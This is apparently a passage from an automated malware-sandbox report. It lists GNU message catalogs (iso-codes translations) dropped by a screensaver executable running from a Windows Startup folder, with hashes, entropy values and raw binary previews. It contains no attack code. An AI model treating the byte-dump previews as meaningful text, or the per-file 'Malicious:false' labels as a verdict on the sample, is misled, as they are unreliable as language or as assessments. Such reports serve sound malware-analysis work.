                                                                                                    Entropy (8bit):5.150734672640683
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosMlF5tbPAvxooxC946nbjz5wsWP48WAINiZGXaipymvALoucXPDC5l0h:0ovlFzbPAZoF948fmsWP48WAI1amfxDx
                                                                                                    MD5:06EA4C1C2DBC22A3D66503A68C92AB7B
                                                                                                    SHA1:D14D3982E77F14279B48AB069652B60B9C181355
                                                                                                    SHA-256:4F8E78DB902BD88D066FB1D43A487787AA679AD566BB409294B8A4CF2FFEA18B
                                                                                                    SHA-512:30AB9A09EA4A01561B89BACF8B2FFFFD7FB7ACDA8E6AC7FF70DE2855A49EDC09D6904615458AFCF2F20679C1C1400D47BFD78F39A5102511B0D4621E9663330A
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 269 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13180
                                                                                                    Entropy (8bit):5.065596266718157
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:odZ3lpMXaR/Ji3TvCJ+Vuj+ICJsy7IQvpRGDTJ/b9Flth4yKIWvC2X7vUSv+F3:odZ1pMX+/2TCJHaIqNQTJT7luq2Lw
                                                                                                    MD5:B47D38B4A67B287719AF0EEF77FD5599
                                                                                                    SHA1:9F9CBF36FA24036EBD4382C94017D16E4479EDDC
                                                                                                    SHA-256:1DAEA821F88DD47B716414847A755FDA30A1F845931E3BC3FC870D2D8137FF34
                                                                                                    SHA-512:AFEF7AE513D6F3A9B76719DC9E58C8EE224C2F05510F8C7302E3718A210AE68E4E048DCB571D6FB41F663B33146BE64C201EC4E8FCD00C6A1CEE5810B9AF21E4
                                                                                                    Malicious:false
                                                                                                    Preview:....................g...........................................................................................................................................................6.......>.......G.......M.......[.......s.......y................................................................................... ...........................-.......9.......@.......S.......n.......y........................................................................................... ...*.......K.......T.......`.......l.......u...................................................!...........................................................................&...............6.......=.......C.......O.......Z......._.......i.......o.......................................................................................................................................&.......+.......A.......H.......\.......m.......r.......y...#...............................................................................#...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britsk\303\251 antarktick\303\251 \303\272zemie'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2887
                                                                                                    Entropy (8bit):5.329050560123615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3QAQAt7+vGqIfdvqN5CoUWxAQhYr7/Na7W5RGRz+zO3qwTKha5y54TIMl:rLvQGZ+yaCoyQ2H/naRzkO3qwxcuIk
                                                                                                    MD5:AA45E0A24C853A8050247B3DEA873BEC
                                                                                                    SHA1:537E0489E0B94E70D7DE567DFA607085D15BF3B8
                                                                                                    SHA-256:4259361C6EB4B2C8170D8114D242B273C2E061CDB0C1A414748CCC4F75CA3EDD
                                                                                                    SHA-512:5BAA125E08A6BF529F0B039F08E628982788E8C6A21F1D1B56B56293F0EDC4B802190A87D7E258C365AFA2A948508E9168CF4C14944138F0E63AA9ED4F6CC649
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................'...........$.......S...:...n...................................%.......*....... ...A.......b...........................................,...........................0.......7...%...@...2...f...........#...............(.......1...........4........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 85 messages, Project-Id-Version: iso_4217 'afg\303\241n (nov\303\275)'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4911
                                                                                                    Entropy (8bit):4.979850146709576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TiImH+f8z9U3r+M4oEWrtmN81fHFMyZTkZ4ZR+0Qpqk+zwmcNnZkczBl:ae0z9U36rCrgNH4AXxzX
                                                                                                    MD5:636C38B0252129521C388FE8639FD5F4
                                                                                                    SHA1:91BA91D25655E8128E0CBF5770ED229C0A4F209F
                                                                                                    SHA-256:FDF9B17026856623BFB0F187C8FDD0429721F09F907EC424EA316731B13259F3
                                                                                                    SHA-512:2E64DFFE60F5DE1100A80F55383E052A8C3A4E6C8B67A4B1ECF469ABF3C933085FFDF8CBA0B13020998905CB33DC9CFE067C9ABA64EC61290D2278E977F9CE1B
                                                                                                    Malicious:false
                                                                                                    Preview:........U...........q...l.......0.......1.......9.......H.......W.......e.......w...............................................................................................'.......=.......J.......Y.......k.......v...............................................................................................$.......5.......C.......P.......].......i.......y...............................................................................................%.......4.......F.......Y.......j.......z...............................................................................................).......@.......P.......`.......o.......}...........................................................................\...........p.......................................................................................).......9.......K.......b.......s............................................................................... .......3.......C.......X.......g.......l.......................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 256 messages, Project-Id-Version: iso_639-3 'a\304\215oli'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11443
                                                                                                    Entropy (8bit):4.913821715747651
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:KAa2nMGTEg/iOVTkiLMWfZT9PFotftLzO85X5c1IWwwNyEyfunRAjP:KAfnMGElOVTbXfbFoBBR0qpPWRA7
                                                                                                    MD5:B79AEB6745C5FCC8041CF5B54F912208
                                                                                                    SHA1:CA684FC4306BA5845A07A690BD521F90EFD3318C
                                                                                                    SHA-256:EDF6F553BCA534BC344703BED99B20E721CB53E782924692ACA2E563B262292E
                                                                                                    SHA-512:A126C27939A5F6EEC5E70E52725607358E2C51BB1460B03BBFE5655B473AD9B805463EC0D3C871DEC7E5B651361188B22E2EB7243987B445F70BDF0F130332BC
                                                                                                    Malicious:false
                                                                                                    Preview:....................[...................................................................................................................................................................................'.......0.......6.......>.......C.......J.......T.......\.......b.......j.......r.......{...............................................................................................................................................................:.......@.......I.......N.......a.......h.......p...............................................................................................................(...............1.......7.......<...#...C.......g...............................................................................................................................................).......-.......2.......8...:...C.......~.......................................................................................................................!.......(.......1.......=.......B.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 108 messages, Project-Id-Version: iso_15924 'arabska pisava'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6350
                                                                                                    Entropy (8bit):4.884466868439717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XF3JF456CaIZM4KnSa54+dR+xz9ZCRDRvPZt/oaaR4mpk5mTM6cNdOds:XDFqiF4Fa54oA1C/f/oXwNdh
                                                                                                    MD5:0F609270C779A7FF56DD644837F7BDDA
                                                                                                    SHA1:83BD4612BD64B126A1732B794E3DA57F799524E1
                                                                                                    SHA-256:BF5D928C78119BC683F9FBC6CF33B5B7F972D931AAFDC551CE56DA04EA9D0189
                                                                                                    SHA-512:20F69C4FE8F9499CED2A94227D0A637164DDD8FAD956AA05C80173009B6937E3D7C78B4030C3FCC038C6062E32790D049D9982DAB88C574A654D3F3D4C88E44A
                                                                                                    Malicious:false
                                                                                                    Preview:........l.......|...............0.......1.......8.......A.......I.......R.......X.......`.......l.......y.......................................................................................................'...............I.......Q...&...Z...............................................................................................&......./.......I.......b.......|.......................................................................................!.......,.......2.......R.......V.......\.......t...............................................................................................................=...(...G.......p..........."....................................................... ...........%.......0.......6.......@.......G.......V.......^.......h.......u.......}...............................................................................................)...%...2.......X...............................#.......3.......C.......T.......m.......~...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 410 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22611
                                                                                                    Entropy (8bit):5.034485905678592
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:te7hGfQDzPGKQv2Wma9Cu6gIoG8je5wsOP4XLAE1irKWxVfKuNyrEyfclmccK2:prKQuWma9CCFn6msOP4XLAEM39kYmK2
                                                                                                    MD5:228DF4CABC03F70A547B68BE700C721A
                                                                                                    SHA1:E64AC74D30C1A0F399CBE176130B4281957D9D43
                                                                                                    SHA-256:128E14F0ACB34A5E588DEA994F0A5C5D15AD3F03A7E5EE38CD467ACB6B6C5176
                                                                                                    SHA-512:63CA8488AE9968A43B5405C8D35006CEC497590206BD1839896824F383C3AF3B9BEDBF8ED0E62096A7BD45BB832CAE4196E77E3D52A8F033E46DF56ED86CB3A7
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........H"......I"......U"......]"......e"......t"......|".......".......".......".......".......".......".......".......".......".......".......".......#.......#.......#......%#.......#......6#......>#......E#......K#......S#.. ...Z#......{#.......#.. ....#.......#.......#.......#.......#.......#.......$....../$......A$......J$......W$......_$......h$......q$......x$.......$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......E%......M%..%...S%......y%.......%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...B&......m&......u&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'...%'..$...M'......r'.......'.......'.......'.......'.......(.......(.......(.......(......%(......6(......F(......b(......h(......z(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......).......)..!...5)......W)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1861 messages, Project-Id-Version: iso_3166-2 'Aargau'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79342
                                                                                                    Entropy (8bit):5.057591748807447
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:APDv2Zma6SWv2gxJuwBGQ8xt3HRQw1OD6SPpKVh0MLk:OjumlJBGQ8xtXRQw1OD6sp+hjLk
                                                                                                    MD5:B91522BDBA81F0A0FFE17B4A0D6F2F10
                                                                                                    SHA1:88499B146E2C5BCF103B1D1B57CE0060120CB03F
                                                                                                    SHA-256:A89CDDB6D549CBFDBB9DAD9632532722C9CDA605418270F53D4B90D310779716
                                                                                                    SHA-512:1D2E28B5169C4B011A48DD380A7A3E17782D3872842CCE0FA6E9511DDFE4381E3BEDD35D93F98D05B17385BD3E929973C5FA4EFDA71CD270094854DED3160BA0
                                                                                                    Malicious:false
                                                                                                    Preview:........E.......D:......lt..............................................................................................................................................................."...............6.......>.......G.......N.......S.......\.......d.......p.......x.................................................................................................................).......:.......@.......G.......S.......[.......e.......q.......{........................................................................................................................................,.......4.......<.......E.......M.......U.......Z.......`.......n.......v.......|...........................................................................................................................%.......-.......@.......H.......N.......Z.......k.......q.......v.......~.................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britansko antarkti\304\215no ozemlje'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2596
                                                                                                    Entropy (8bit):5.1828873926784444
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADHvXvGqIfdvqNuoUX/RI7ejLAr5pe2AVwygcDZYnjpp7M:qDH/yBowtq52gcDsC
                                                                                                    MD5:C24D71BD2F279E80622752696D025030
                                                                                                    SHA1:E710428328CCC4D7012FF5559DA44F75AAAAD412
                                                                                                    SHA-256:85EFBD7123EBF316A7445E8E95A4A94529C27439C5C906EFB7A21C71EBE5B752
                                                                                                    SHA-512:73AE0830D0BFE7E69C0C1F3CAE5023CF651DFB6D5A88EFF1D6F77B530469A886D09F4B7E3351BC8471AC1316913C6D742EB2F1273B75165293BEDEF13BC0E47A
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................+...(...J...,...s...........)....................................... ...)...(...J.......s...................................................#...................6.......K.......Q... ...a...)...............................%....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 'afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7114
                                                                                                    Entropy (8bit):4.776735770176595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehCmFISf3epPCVOkKiCWNnISIz3kBbDNf:Hn48dupPGlKifnIzwbDNf
                                                                                                    MD5:069EBEFE756C813E6EB66CA783F2E920
                                                                                                    SHA1:0423951ACB2797BC37F4C7AC1F59BBC8EC5AB2DC
                                                                                                    SHA-256:051EA8F89764F8C1AA02063B1CE8E68E85F66DDFBF715DD632E8F7C824CBD397
                                                                                                    SHA-512:C3E193BAB00CC2A9564528FFCF0EA3661450636407860E2F016055A83AB0DFE4C5ABA140EBF1BABC0F4CC5FC1A518DAA3F8E1A451CE6DEAE1EFB07487600A8EC
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 323 messages, Project-Id-Version: iso_639-3 'abha\305\241\304\215ina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14346
                                                                                                    Entropy (8bit):4.768853034820279
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:f6vsSzFPegGnbBL6VexdgdzSHgRb+PFMQI7yGUJPdSFZjHUdpcd33rurHDd0DuAE:faTGRpxdgY8gFMQI7BFFx0UEHDdo7O53
                                                                                                    MD5:8C2BAA8823C935EF0139EFB8A5F5BD68
                                                                                                    SHA1:6274DF5C3651AFD59AAD60FD1830BD7A094C16F1
                                                                                                    SHA-256:992E65C8C0AD1EC3AD7C1602B50FD9915B845A4FD514A5E869EFCBBE5E40987C
                                                                                                    SHA-512:C321CB0A7CD7E2B8DB4D4C8C958B7F2BEA3581056C3CDB4ECE714C62CDB22F27585D57D879C624B0800D9BAF1F5F2412AD29AD15F50FD9D259171C2C83D680EF
                                                                                                    Malicious:false
                                                                                                    Preview:........C.......4.......L.......................................".......*......./.......8.......B.......G.......P.......Y......._.......g.......n.......u.......................................................................................................................................................................#.......(......./.......8.......B.......I.......Q.......Y.......a.......j.......s.......{...............................................................................................................................................................'.......-.......4.......:.......@.......F.......O.......T.......g.......n.......v.......~.......................................................................................................................................................................$...............5.......;.......T.......j.......r.......{.......................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 16 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1189
                                                                                                    Entropy (8bit):5.093539366987194
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2DieynWreSDOO5ECVt0U8GENW/OXmGRLpl6:Qi1nMeSDl5ElUcWTil6
                                                                                                    MD5:6279A8AC54B44810EA0C413E1A07779E
                                                                                                    SHA1:197010F4E7179DC0D908FD4E58C28D5226D47A32
                                                                                                    SHA-256:B7BA7287CAF4E9C858A3B4F8470C46DFFBD1BB41BD5523514998D7BA90C07374
                                                                                                    SHA-512:94CD6031FB76E0D4B3DF97B403514DBA8683CF3AB726A499083CE9848D69A3AB782E0EF9276BEA74080B734927D302DDE711F58F7FA61A8457D6D918299F872E
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y......................................................................................................................................................................./.......7.......@.......H.......P.......[.......b.......q.......{........................................................................................................Adlam.Afaka.Ahom, Tai Ahom.Arabic.Arabic (Nastaliq variant).Armenian.Avestan.Balinese.Bamum.Bassa Vah.Batak.Bengali.Bhaiksuki.Caucasian Albanian.Imperial Aramaic.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2023-01-20 19:59+0000.Last-Translator: Shafici Isxariifshe <mega12xhaphiee@gmail.com>.Language-Team: Somali <https://hosted.weblate.org/projects/iso-codes/iso-15924/so/>.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 132 messages, Project-Id-Version: iso_3166-1 'Afgaanistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6066
                                                                                                    Entropy (8bit):4.711967093935229
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:tDRtEJWl5EIFFrx8JU+xtxPSW6beF4se6/W14rXwoyga0dmB4Bqkeic5K:tDRtEJWl5EIPreJU+xtRveeF4se6/WiN
                                                                                                    MD5:341BCB3D9BF343F2A315F225C9AE0890
                                                                                                    SHA1:3A30EA316C53D4466316E6C4CFF802687AEF2435
                                                                                                    SHA-256:BFA8A1DEEBDC9AA6D3DEFA3B97FE789EB719E1A778DA1F9B5CD3A20C2CFD4AC0
                                                                                                    SHA-512:6BFA6FEBAFB31E38FCC236C1FE8DAE13D09BB65F87AEE25F83C236A777093D17F84BA1133968112F63B98E193CAADF77D30257562E7B00F89B1DB47F3BE0ECD9
                                                                                                    Malicious:false
                                                                                                    Preview:................<.......\.......(.......).......5.......=.......E.......M.......T.......h.......r.......z...............................................................................................................................................".......).......B.......G.......M.......S.......\.......g.......o.......t.......{...............................................................................................................................................!.......(.......F.......N.......V.......\.......f...................................................................................&................................... .......(.......0.......8.......>.......I.......T.......[.......d.......i.......o.......z...............................................................................................................................................'.......=.......E.......X.......e.......r.......z...............................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147693394519902
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:7BF0B30C29A1957C4294552FA44952F5
                                                                                                    SHA1:8ACEB1527B83C553B1EFA83C66FBE84773E58585
                                                                                                    SHA-256:9B01F66719B7094D31257F472500E3EDD3620E42E98F95D1DC37ABA20F9CC17B
                                                                                                    SHA-512:4FBDE61F4CFAE27F5EAA24FAAB7CD1416ED215BB97AF4EC0A28D287C271D9E462196353921977DBFB61EE622F45A168D596BB0BF62E00054C58F14B77721DD7A
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6 messages, Project-Id-Version: iso_3166-3 'Jamhuriyada Kacaanka hanti wadaaga ee Belarus'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):996
                                                                                                    Entropy (8bit):5.221601171933196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Jscfnq7pWUA5t0Un3afNW/lXmGErXBZLPF:NvKRAoUnKlWoFrX3LN
                                                                                                    MD5:C32974D28D42462D0707D3DC30DA294A
                                                                                                    SHA1:671ED5F53B0032F6BB13AECFA7B0672953211332
                                                                                                    SHA-256:409F7590D11ED6998F33DD3ABC25E027403D85F5B6A955EBAE00682153DFBA83
                                                                                                    SHA-512:F4AB72E6DE2146FAEBB8533EC6675A10DD185FF173073F5144BE06F2A230DD821178ED18E28B02E7C87ECB0B824F0E1A8E2D7F5B9F48B5ADA1531BFA5BDF1877
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|...........*.............../...........!.......<.......R...-....... ...M...9...n..."............................................................Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.German Democratic Republic.Serbia and Montenegro.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-11-08 02:27+0000.Last-Translator: Sirr Burhaan <sirrburhaan@gmail.com>.Language-Team: Somali <https://hosted.weblate.org/projects/iso-codes/iso-3166-3/so/>.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.3.2..Jamhuriyada Kacaanka hanti wadaaga ee Belarus.Canton Iyo Jasiiradaha Enderbury.Jegoslafakiya, Jegoslafakiya Jahuuriyada Hanti wadaaga ah.Jamhuriyada dimiqraadiga ee Jarmal.Sayberiya iyo Montinegro.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):370
                                                                                                    Entropy (8bit):5.147120633157777
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijLYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4LxxRt02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:38B40AC52EB32BE41FD9010FCE052B60
                                                                                                    SHA1:17EE1F9D51A2A57485AC3F26E7E502D2C0D30362
                                                                                                    SHA-256:1665529045E81E95BD352477C800D7CC3DC36691A5CCAA8C8AE85EBD6A30CE32
                                                                                                    SHA-512:9113731CD47A05B4ED65271A08F6E2328C03E536A7980B51E35B5F582AAC818C9FB8C12FFC4E9793EFBE5B3AB8155F9B9D306AB2AF006E9D760F18B160AB9B71
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...8...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.140627882633461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGrvXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITAXmBQWi9
                                                                                                    MD5:2481667F54DBBE5214502C1F822BED79
                                                                                                    SHA1:93A1B710EF5A4D1AAAA93741D69AB16DBE47DA38
                                                                                                    SHA-256:A9F9FF7A83A41997B7E7F27DADB50451DCA49FD75A4B5EA6BD95E5CA054B9836
                                                                                                    SHA-512:7AA815F6AB23C78067986F48BE2063764FF47C1E685D838E56555248A2DFCA18C8CD1E73C2764861EE94B5DF1CBA5060151F851799E150E560AF342050A70D34
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: so.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 211 messages, Project-Id-Version: iso_3166-1 'Afugaanisitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9275
                                                                                                    Entropy (8bit):4.747189261110563
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XWlGwfqqE5WGtXQk/xT/aRzug09pVN+MQVNQ5dwS2Ou:XWtE8Gtg6xzaNugUpVN8C5WFOu
                                                                                                    MD5:E730AE3D478E820CF78BD27C3A600A11
                                                                                                    SHA1:9128F7DE916FA83D6D8272DC8C4D6F62E0B313B8
                                                                                                    SHA-256:0497F71F7945B179E63F1CE0FCC3B61E37D16EDC3F54CAFA4618EEF0A5641065
                                                                                                    SHA-512:8EB19A29EFE3064A1549D74A4B9B26850E9535C8BD7A6284233154C33C7BC4582FD4ED78F9942EDF5A6AFA154E840178B315BE5DA36540E6BCBCE55D56C56E7A
                                                                                                    Malicious:false
                                                                                                    Preview:........................L...............................................................................................................!.......).......4.......<.......D.......O.......X.......`.......h.......o.......u.......}...............................................................................................................&.......?.......D.......J.......P.......a.......y.............................................................................................................................................../.......7.......?.......H.......V.......[.......c.......j.......x.......................................................................................................................................#.......*.......0.......9.......C.......K.......S.......Y.......c.......h.......p.......|...............................................................................................................................................................$.......+.......4.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_15924
                                                                                                    Category:dropped
                                                                                                    Size (bytes):518
                                                                                                    Entropy (8bit):5.311570819715247
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4/xxCfVt02UkwJA/YcKB8LLFw/43PvIsXmBQWiOWF:RZCVt0UPCT/psXmGF
                                                                                                    MD5:2995B051BF1CD12B74C975C16881B4B6
                                                                                                    SHA1:561C6173287B31546714880CED396D3EEC646110
                                                                                                    SHA-256:BAA5062916C9B95BA3317F135EAFBBA1A5C6B2A593FAF95DA918E61FB4B97595
                                                                                                    SHA-512:2E771088148325D86F69211429CA7EDDBE5384CBEB1EE3487F3E9E27C4372E6B1DBF2140D388AFD31630FEDADEFCCE4BA46B6ECB9C89B63E9CF75AC4494FAFD9
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-11-26 20:47+0000.Last-Translator: Besmir Godole <bgodole@gmail.com>.Language-Team: Albanian <https://hosted.weblate.org/projects/iso-codes/iso-15924/sq/>.Language: sq.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.15-dev..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 421 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23866
                                                                                                    Entropy (8bit):5.04697200416743
                                                                                                    Encrypted:false
